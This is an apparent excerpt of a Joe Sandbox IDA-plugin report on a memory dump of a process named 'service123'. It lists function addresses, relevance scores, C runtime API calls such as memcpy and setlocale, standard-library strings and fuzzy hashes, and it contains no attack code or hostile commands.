Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 07467d4929d86937e24a82f453c0a9ee50b3ddc56c0918f2b9a28f84655aeebc
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: 606107B5609701CFC714DF2AC1A061AFBE1EF98754F15C92DE4998BB60E730E884CB52

Function 6CA60970 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C9F92A3,00000003), ref: 6CA609ED
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C9F92A3,00000003), ref: 6CA60A2C

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: 91b2c8162b226afde89f54a03f96c3e5c50c49e220619606522bb5b0115707bb
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 8C61E3B5509746CFC704DF2AC09051AFBE1AFA9754F14C91EE8EA8BB61D730E884CB46

Function 6CA62B90 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6CA5736E), ref: 6CA62C03

Strings

basic_string::basic_string, xrefs: 6CA62D0C, 6CA62D69
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA62D14, 6CA62D71, 6CA62DD6
string::string, xrefs: 6CA62DCE
basic_string::_M_create, xrefs: 6CA62C1A, 6CA62CBA

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: d2a6f2d280440262f1c0159a36971b8c34c13e8e9d65de0670e9e7452ad8332a
Instruction ID: 19fbbe42b225992ad82d0c998507140fcb054eff16f61adce4fdde9d0a164c37
Opcode Fuzzy Hash: d2a6f2d280440262f1c0159a36971b8c34c13e8e9d65de0670e9e7452ad8332a
Instruction Fuzzy Hash: 097172B29093508FC300DF2DD48064AFBE0BF99258F55CAAED98C9B715D331D885CB92

Function 6C9CEB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: 5f60ae61e18150a0b802f2970e7ab1b2e4a2f5ef65d7dbbb91b87fc2ab6a9cc8
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 7D61C0717493048FD710CF19C48266AF7E9AF98308F448E2EE89A9BB54D730D9468BD7

Function 6C9DB060 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9DAF3F), ref: 6CA95FF0
abort.MSVCRT(?,?,?,?,?,?,6C9DAE9C,?,?,?,?,?,?,6CA96040), ref: 6CA95FF8
abort.MSVCRT(?,?,?,?,?,?,6C9DAE9C,?,?,?,?,?,?,6CA96040), ref: 6CA96000
abort.MSVCRT(?,?,?,?,?,?,6C9DAE9C,?,?,?,?,?,?,6CA96040), ref: 6CA96008

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a874435a1b2689bccf55e0a1c2c8da61648ad2adf4d81bf41b430dabfb72eaa0
Instruction ID: e6602b6167ecf7a51fe2246f5e7efc7546fb663c453328f89e8fbd0c9403fd0b
Opcode Fuzzy Hash: a874435a1b2689bccf55e0a1c2c8da61648ad2adf4d81bf41b430dabfb72eaa0
Instruction Fuzzy Hash: 934126716157158BCB00AF74C4922AAB7F1EF9231CF15C86DD488ABB14DB36E48EC791

Function 6C9C1020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C9C1281,?,?,?,?,?,?,6C9C13AE), ref: 6C9C1057
_amsg_exit.MSVCRT ref: 6C9C1086

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 5069db45728feec4e928da7e127e055e75bb3ee1f134b3d1c13f923a11e7d36a
Instruction ID: 199c920ea6d4f6598068da9b71cbe76c50225462282e40ccbcc0139afec369ed
Opcode Fuzzy Hash: 5069db45728feec4e928da7e127e055e75bb3ee1f134b3d1c13f923a11e7d36a
Instruction Fuzzy Hash: 70318870309342CBDB40EF29C59135A77F4AB4B398F118929D484CBA41DB35DA86EBD7

Function 6C9E1F00 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C9E1F18
strlen.MSVCRT ref: 6C9E1F22
memcpy.MSVCRT ref: 6C9E1F3F
setlocale.MSVCRT ref: 6C9E1F52
wcsftime.MSVCRT ref: 6C9E1F76
setlocale.MSVCRT ref: 6C9E1F88

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction ID: f7012d1c131a1337be9203d6224372a90b7184bef2e1ee5867a74b3bca59f453
Opcode Fuzzy Hash: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction Fuzzy Hash: D211C5B5509710AFC740BF69C19465ABBE4BFA8754F428C2DE4C88B710EB78E844CB92

Function 6C9E1C50 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C9E1C68
strlen.MSVCRT ref: 6C9E1C72
memcpy.MSVCRT ref: 6C9E1C8F
setlocale.MSVCRT ref: 6C9E1CA2
strftime.MSVCRT ref: 6C9E1CC6
setlocale.MSVCRT ref: 6C9E1CD8

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction ID: 4ccb4e6a321ec59d1f43f41fd9079d6626f363cb034d7f29eb6f8306e232ef0f
Opcode Fuzzy Hash: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction Fuzzy Hash: BC11D6B5509710AFC740BF68C18475EBBE4BFA8644F428C6DE8C88B701EB74E844CB92

Function 6C9CED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: f3812faf6482f8646bc90758230271c59d37423f2a0ef85b3caa8f26b17be9f8
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: 6FB01232EC8974C5CF2065BC00263D6B24D9F2338CF02080BC17773D088A12F083818B

Function 6C9DE0D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C9DE117
LocalFree.KERNEL32 ref: 6C9DE14B

Strings

Unknown error code, xrefs: 6C9DE18C
basic_string: construction from null is not valid, xrefs: 6C9DE1A7

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: 8dc658f953ed623f28cbe8160c608ddd745a1b1be06eee45544cfe7eb8e6a375
Instruction ID: 4df8a7c86fd7f85466176500fd02f7314103b9f1eeda7ac53fba1685b32c61a3
Opcode Fuzzy Hash: 8dc658f953ed623f28cbe8160c608ddd745a1b1be06eee45544cfe7eb8e6a375
Instruction Fuzzy Hash: D3416CB2A157059FCB00AF69C48669EFBF4FF89318F41882CE4849BB10D37495898BD3

Function 001C2F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 001C2E97
fputc.MSVCRT ref: 001C2F07
memset.MSVCRT ref: 001C2FC2

Strings

0, xrefs: 001C2FB7
o, xrefs: 001C2FCA

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: 8e2d9b34fcc5ea5f8a80a81220fb3ddea9a3b5b9fd2472f1483c7a305551b1f8
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 56316B72A04305CFCB14CF68C094BAABBF1BF68310F15852DE999AB351D738E940CB50

Function 6C9D3659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C9D3567
fputc.MSVCRT ref: 6C9D35D7
memset.MSVCRT ref: 6C9D3692

Strings

0, xrefs: 6C9D3687
o, xrefs: 6C9D369A

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: fccd3099f70d340c7f8ae512abbc494e36099fbada2cbb2224d21b3737c0dd38
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: A6316A72A18B058BCB00CF68C1807AAB7F5BF48315F16C669D999BBB41E738F800CB50

Function 6C9C9490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C9C94C2
strlen.MSVCRT ref: 6C9C9616

Strings

_GLOBAL_, xrefs: 6C9C94B7

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: a2566ea2c221a124c5dad66fa67c731808375961b040afabb86c0ebccf3b85e0
Instruction ID: af588227c6fd4e77e803fd86ca77de344d8a26b5b2ee68975bc3859620d51c92
Opcode Fuzzy Hash: a2566ea2c221a124c5dad66fa67c731808375961b040afabb86c0ebccf3b85e0
Instruction Fuzzy Hash: 11F17F70E052688FEB10CF25C8943DDBBF5AF46308F1541EAC849AB645D779DA89CF82

Function 6CA3DAB0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6CA5F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA3DA2E), ref: 6CA5F95D
Part of subcall function 6CA5F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA3DA2E), ref: 6CA5F988

memcpy.MSVCRT ref: 6CA3DCB5

Part of subcall function 6CA62530: memcpy.MSVCRT(?,-00000001,?,6C9E749E,?,?,?,?,?,?,?,?,?,?,?,6C9E8E25), ref: 6CA6256C

Strings

iostream error, xrefs: 6CA3DD08
basic_string::append, xrefs: 6CA3DDB2, 6CA3DDBE
Unknown error, xrefs: 6CA3DB08

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: 5b5cbd1b3765f647ef70744d837a3d8cd1592c0231934a7f1fb473d63c685632
Instruction ID: 95c1c1fff5bd935c5ae2327e9aa3b62ff57e9e55daafda2f438ecb9595a0710a
Opcode Fuzzy Hash: 5b5cbd1b3765f647ef70744d837a3d8cd1592c0231934a7f1fb473d63c685632
Instruction Fuzzy Hash: 83A1F471D15328CBCB14DFA9C59469DBBF1BF48314F24892ED498AB751E730A889CF82

Function 6CA2BF60 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA2C03F
memcpy.MSVCRT ref: 6CA2C099
memcpy.MSVCRT ref: 6CA2C127

Part of subcall function 6CA2C500: memcpy.MSVCRT ref: 6CA2C58C

Strings

basic_string::replace, xrefs: 6CA2C194, 6CA2C1A7
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA2C1B3

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: ab2af7e5364751aacef387833c60d52c55a1bc77f19ef2e0a8ee22e3a31529f6
Instruction ID: df7327f3a3eb2c5ba56ce8940702db3293ff5b4867d2c09a9551de64db74e492
Opcode Fuzzy Hash: ab2af7e5364751aacef387833c60d52c55a1bc77f19ef2e0a8ee22e3a31529f6
Instruction Fuzzy Hash: CA814871A096259FCB00EF2CC58159EBBF1FF88718F19892DE89897710E734D984CB92

Function 6CA35000 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA350D0
memcpy.MSVCRT ref: 6CA35124
memcpy.MSVCRT ref: 6CA351B8

Part of subcall function 6CA35590: memcpy.MSVCRT ref: 6CA35620

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA35248
basic_string::replace, xrefs: 6CA35229, 6CA3523C

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 606a150252db6ba763d5a93490e5ef854f8b5b4d0c5839b953a89f0029ac63c6
Instruction ID: 1c755fb8c60d9da0462fb0499ebd872101f281134080cf743d5340ad8c4c0f26
Opcode Fuzzy Hash: 606a150252db6ba763d5a93490e5ef854f8b5b4d0c5839b953a89f0029ac63c6
Instruction Fuzzy Hash: 5F815572A093259FCB00DF6DC59069EBBF0AF89354F15892EE899D7710D335E8848B92

Function 6CA3D810 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA5F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA3DA2E), ref: 6CA5F95D
Part of subcall function 6CA5F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA3DA2E), ref: 6CA5F988

strlen.MSVCRT ref: 6CA3D8E5
memcpy.MSVCRT ref: 6CA3D9BE

Strings

iostream error, xrefs: 6CA3DA12
Unknown error, xrefs: 6CA3D85E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
